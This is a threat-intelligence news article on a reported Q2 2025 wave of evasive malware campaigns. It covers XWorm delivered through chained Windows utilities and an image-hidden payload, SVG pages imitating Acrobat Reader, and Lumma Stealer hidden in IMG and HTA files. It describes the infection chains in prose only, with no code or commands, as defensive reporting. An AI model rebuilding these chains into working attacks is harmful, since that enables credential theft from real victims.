The Art of Digital Evasion: How Attackers Hide in Plain Sight
In the second quarter of 2025, experts at HP Wolf Security documented a wave of sophisticated attacks in which adversaries employed unconventional living-off-the-land (LOTL) tactics to evade detection. Multiple obscure system utilities were brought into play, while final malicious payloads were concealed within inconspicuous formats such as images or SVG files. This approach significantly complicates detection and enables attackers to remain hidden for extended periods.
In one incident, researchers detailed how a carefully chained sequence of Windows utilities delivered XWorm, a remote access trojan (RAT) with credential-stealing capabilities. The initial vector was email attachments with a .CHM extension, disguised as documentation. Hidden inside was a script that triggered a multistage infection chain.
The process involved a binary that copied cscript.exe into a public directory. A VBScript was then placed in the same folder and executed via PowerShell, which in turn retrieved a JavaScript file into ProgramData and launched it with the native Windows interpreter. The pivotal stage came with the download of an image from Tagbox, a legitimate digital asset management service. The image contained an encrypted payload that was decoded into a Bitmap object and ultimately executed through MSBuild, allowing the trojan to infiltrate the system while bypassing most security filters.
Researchers also highlighted campaigns leveraging SVG files. These objects open directly in browsers and function essentially like HTML pages, capable of embedding JavaScript or pulling in external resources. In several attacks, victims were presented with a convincing replica of an Acrobat Reader page complete with a loading animation. After simulating a “document download,” the page prompted the victim to retrieve an archive, which in reality redirected them to an external server. There, a ZIP file containing encrypted JavaScript was served. This strategy granted initial access while geofencing restrictions ensured that downloads were limited to certain regions, frustrating analysts and delaying detection.
Particular attention was also given to renewed activity by Lumma Stealer. Although parts of its infrastructure were dismantled in May 2025, new campaigns surfaced in June. In these, malicious code was hidden inside IMG image files attached to phishing emails. The image contained an HTA file disguised as an invoice, its code obscured with long sequences of spaces to hinder superficial analysis. When executed, the HTA ran a PowerShell command that downloaded an NSIS installer. The installer created fake registry entries and referenced nonexistent files to mislead forensic investigators. Another PowerShell stage then unpacked and executed a file from AppData, eventually activating Lumma Stealer, which is capable of exfiltrating credentials and other sensitive data.
Thus, the second quarter of 2025 was marked by attacks combining obscure Windows utilities, atypical file formats, and multilayered loading mechanisms. Analysts emphasize that these techniques are evolving at a rapid pace, with adversaries even reviving malware families whose infrastructures had only recently been disrupted.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
